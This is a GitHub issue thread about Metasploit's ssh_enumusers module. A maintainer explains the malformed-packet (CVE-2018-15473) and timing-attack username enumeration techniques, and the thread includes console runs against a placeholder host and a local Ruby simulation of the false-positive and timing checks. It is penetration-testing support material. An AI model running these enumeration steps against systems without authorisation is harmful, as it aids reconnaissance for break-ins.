rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

auxiliary(scanner/ssh/ssh_enumusers) execution completes but produces no results #15676

Closed njmulsqb closed 2 years ago

njmulsqb commented 3 years ago

Hi,

I am running this auxiliary(scanner/ssh/ssh_enumusers) module to enumerate usernames on an SSH target, but it is completing execution without producing any result or telling whether the target is vulnerable or not, or whether usernames can be enumerated or not. The execution looks something like this:

[*] 1.2.3.4:443 - SSH - Using malformed packet technique
[*] 1.2.3.4:443 - SSH - Checking for false positives
[*] 1.2.3.4:443 - SSH - Starting scan
[*] Scanned 1 of 2 hosts (50% complete)
[*] 1.2.3.4:443 - SSH - Using malformed packet technique
[*] 1.2.3.4:443 - SSH - Checking for false positives
[*] Scanned 1 of 2 hosts (50% complete)
[*] 1.2.3.4:443 - SSH - Starting scan
[*] Scanned 1 of 2 hosts (50% complete)
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed

Note: The IP 1.2.3.4 is placed intentionally to replace the IP of a real target.

bcoles commented 3 years ago

This module supports two actions:

https://github.com/rapid7/metasploit-framework/blob/b11237fea02f1c7a6776e35fedb6fb5df70a1033/modules/auxiliary/scanner/ssh/ssh_enumusers.rb#L45-L54

The module info outlines the techniques used by these actions:

https://github.com/rapid7/metasploit-framework/blob/b11237fea02f1c7a6776e35fedb6fb5df70a1033/modules/auxiliary/scanner/ssh/ssh_enumusers.rb#L14-L26

The Malformed Packet technique uses SSH_MSG_USERAUTH_REQUEST (CVE-2018-15473).

Only some SSH servers, such as OpenSSH, were affected. This technique will not work on unaffected SSH servers.

The vendor treated this behaviour as a bug and provided a patch (3 years ago). This technique will not work on patched systems.

This technique will not work on modules which do not have public key authentication enabled.

msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /root/Desktop/metasploit-framework/data/wordlists/unix_users.txt
USER_FILE => /root/Desktop/metasploit-framework/data/wordlists/unix_users.txt
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set rhosts 1.2.3.4
rhosts => 1.2.3.4
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 1.2.3.4:22 - SSH - Using malformed packet technique
[*] 1.2.3.4:22 - SSH - Starting scan
[+] 1.2.3.4:22 - SSH - User '4Dgifts' found
[+] 1.2.3.4:22 - SSH - User 'abrt' found
[+] 1.2.3.4:22 - SSH - User 'adm' found
[+] 1.2.3.4:22 - SSH - User 'admin' found
[+] 1.2.3.4:22 - SSH - User 'administrator' found
[+] 1.2.3.4:22 - SSH - User 'anon' found
[+] 1.2.3.4:22 - SSH - User '_apt' found
[+] 1.2.3.4:22 - SSH - User 'arpwatch' found
[+] 1.2.3.4:22 - SSH - User 'auditor' found
[+] 1.2.3.4:22 - SSH - User 'avahi' found
[+] 1.2.3.4:22 - SSH - User 'avahi-autoipd' found
[+] 1.2.3.4:22 - SSH - User 'backup' found
[+] 1.2.3.4:22 - SSH - User 'bbs' found
[+] 1.2.3.4:22 - SSH - User 'beef-xss' found
[+] 1.2.3.4:22 - SSH - User 'bin' found
[+] 1.2.3.4:22 - SSH - User 'bitnami' found
[+] 1.2.3.4:22 - SSH - User 'checkfs' found
[+] 1.2.3.4:22 - SSH - User 'checkfsys' found
[+] 1.2.3.4:22 - SSH - User 'checksys' found
[+] 1.2.3.4:22 - SSH - User 'chronos' found
[+] 1.2.3.4:22 - SSH - User 'chrony' found
[+] 1.2.3.4:22 - SSH - User 'cmwlogin' found
[+] 1.2.3.4:22 - SSH - User 'cockpit-ws' found
[+] 1.2.3.4:22 - SSH - User 'colord' found
[+] 1.2.3.4:22 - SSH - User 'couchdb' found
[+] 1.2.3.4:22 - SSH - User 'cups-pk-helper' found
[+] 1.2.3.4:22 - SSH - User 'daemon' found
[+] 1.2.3.4:22 - SSH - User 'dbadmin' found
[+] 1.2.3.4:22 - SSH - User 'dbus' found
[+] 1.2.3.4:22 - SSH - User 'Debian-exim' found
[+] 1.2.3.4:22 - SSH - User 'Debian-snmp' found
[+] 1.2.3.4:22 - SSH - User 'demo' found
^C[*] Caught interrupt from the console...
[*] Auxiliary module execution completed

As per the module description:

> Testing note: invalid users were logged, while valid users were not. YMMV.

The module also supports a CHECK_FALSE option which can be used to eliminate false positives.

msf6 > use auxiliary/scanner/ssh/ssh_enumusers
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /tmp/users
USER_FILE => /tmp/users
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set CHECK_FALSE
CHECK_FALSE => false
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set CHECK_FALSE true
CHECK_FALSE => true
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set rhosts 1.2.3.4
rhosts => 1.2.3.4
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 1.2.3.4:22 - SSH - Using malformed packet technique
[*] 1.2.3.4:22 - SSH - Checking for false positives
[-] 1.2.3.4:22 - SSH - throws false positive results. Aborting.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_enumusers) > 

The Timing Attack technique relies upon time-based enumeration (CVE-2003-0190, CVE-2006-5229, CVE-2016-6210).

This is a generic technique which may or may not work on some SSH servers. Username enumeration via timing attacks is a common technique and an easy trap for developers to fall into - as demonstrated by multiple CVEs for OpenSSH. The most recent OpenSSH CVE (CVE-2016-6210) was patched 5 years ago.

> it is completing execution without producing any result

You can set VERBOSE true for verbose output which prints each username as it is tested.

msf6 auxiliary(scanner/ssh/ssh_enumusers) > set action Timing\ Attack
action => Timing Attack
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /tmp/users
USER_FILE => /tmp/users
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(scanner/ssh/ssh_enumusers) > cat /tmp/users
[*] exec: cat /tmp/users

root
admin
test
guest
doesnotexist
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 1.2.3.4:22 - SSH - Using timing attack technique
[*] 1.2.3.4:22 - SSH - Starting scan
[-] 1.2.3.4:22 - SSH - User 'root' not found
[-] 1.2.3.4:22 - SSH - User 'admin' not found
[-] 1.2.3.4:22 - SSH - User 'test' not found
[-] 1.2.3.4:22 - SSH - User 'guest' not found
[-] 1.2.3.4:22 - SSH - User 'doesnotexist' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_enumusers) > 

> or telling whether the target is vulnerable or not or usernames can be enumerated or not.

The nature of timing attacks requires "known good" data and "known bad" data to contrast.

The correct way to determine whether the target is vulnerable is to successfully enumerate usernames. If usernames cannot be enumerated then the target is not vulnerable to username enumeration. If usernames are successfully enumerated then the target is vulnerable to username enumeration.
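The two decision rules bcoles describes above, the CHECK_FALSE canary for the malformed-packet action and the "known good" versus "known bad" contrast for the timing action, can be shown without any network traffic. The following Ruby is an added example written for this thread; it is not the module's code. Every probe is a constructed lambda standing in for the module's per-username exchange, the seeded delays are invented rather than measured, and all method and constant names (`throws_false_positives?`, `timing_baseline`, `timing_found?`, the z-score and 20 ms margin) are hypothetical choices, not options of ssh_enumusers.

```ruby
require 'securerandom'

# Added illustration of the two decision rules discussed in this thread. Nothing
# here talks to a server: every "probe" is a constructed lambda standing in for
# the module's per-username network exchange, and all names are hypothetical.

# ---------- Part 1: the CHECK_FALSE idea for the malformed-packet action ----------

# A probe returns true when the server's response looks like "user exists".
# Two constructed servers: one unaffected by CVE-2018-15473 (every name looks
# found, which is what the long "User ... found" listing above shows) and one
# that actually leaks a yes/no signal.
LEAKY_SERVER_USERS = %w[root admin backup].freeze
ALWAYS_FOUND_PROBE = ->(_user) { true }
LEAKY_PROBE        = ->(user) { LEAKY_SERVER_USERS.include?(user) }

# A random 16-character name that cannot exist on any realistic system.
def random_nonexistent_user(len = 16)
  SecureRandom.alphanumeric(len)
end

# If a name that cannot exist is still reported as found, the technique is
# producing false positives against this server and "found" means nothing.
def throws_false_positives?(probe, tries: 3)
  tries.times.any? { probe.call(random_nonexistent_user) }
end

# Returns :false_positives when the canary check fails, otherwise the names the
# probe reports as found.
def enumerate_users(probe, candidates, check_false: true)
  return :false_positives if check_false && throws_false_positives?(probe)

  candidates.select { |user| probe.call(user) }
end

# ---------- Part 2: known-good vs known-bad contrast for the timing action ----------

def mean(xs)
  xs.sum.to_f / xs.size
end

def stddev(xs)
  return 0.0 if xs.size < 2

  m = mean(xs)
  Math.sqrt(xs.sum { |x| (x - m)**2 } / (xs.size - 1))
end

# Constructed timed probe: responses take about slow_ms for existing users and
# fast_ms otherwise, plus seeded jitter so the example is reproducible. An
# unaffected (patched) server is modelled by passing an empty existing list.
def constructed_timed_probe(existing, seed: 1, fast_ms: 50.0, slow_ms: 500.0, jitter_ms: 10.0)
  rng = Random.new(seed)
  ->(user) { (existing.include?(user) ? slow_ms : fast_ms) + rng.rand(jitter_ms) }
end

# "Known bad" baseline: time a handful of names that cannot exist.
def timing_baseline(timed_probe, samples: 8)
  delays = Array.new(samples) { timed_probe.call(random_nonexistent_user) }
  { mean: mean(delays), sd: stddev(delays) }
end

# A candidate counts as found only when its delay sits well outside the
# known-bad distribution AND is separated by an absolute margin, so jitter
# alone can never produce a hit. Both thresholds are constructed choices.
def timing_found?(baseline, delay_ms, z: 3.0, min_gap_ms: 20.0)
  sd  = [baseline[:sd], 1.0].max
  gap = delay_ms - baseline[:mean]
  gap > z * sd && gap > min_gap_ms
end

# Empty result on a server with no timing leak: that is the "not vulnerable to
# username enumeration" outcome described in the thread, not an error.
def timing_enumerate(timed_probe, candidates)
  baseline = timing_baseline(timed_probe)
  candidates.select { |user| timing_found?(baseline, timed_probe.call(user)) }
end

if $PROGRAM_NAME == __FILE__
  p enumerate_users(ALWAYS_FOUND_PROBE, %w[root doesnotexist])   # => :false_positives
  p enumerate_users(LEAKY_PROBE, %w[root doesnotexist admin])    # => ["root", "admin"]
  p timing_enumerate(constructed_timed_probe(%w[root admin]), %w[root guest admin doesnotexist])  # => ["root", "admin"]
  p timing_enumerate(constructed_timed_probe([]), %w[root guest admin])  # => []
end
```

Run it as a plain script. The first case reproduces the situation the CHECK_FALSE run above reports ("throws false positive results. Aborting."): an unaffected server answers every name the same way, so the canary fails before any candidate is tried. The timing half shows why the action cannot give a verdict without a baseline: with no known-bad samples there is nothing to contrast a candidate against, and a server that does not leak simply yields an empty list.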

github-actions[bot] commented 2 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] commented 2 years ago

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.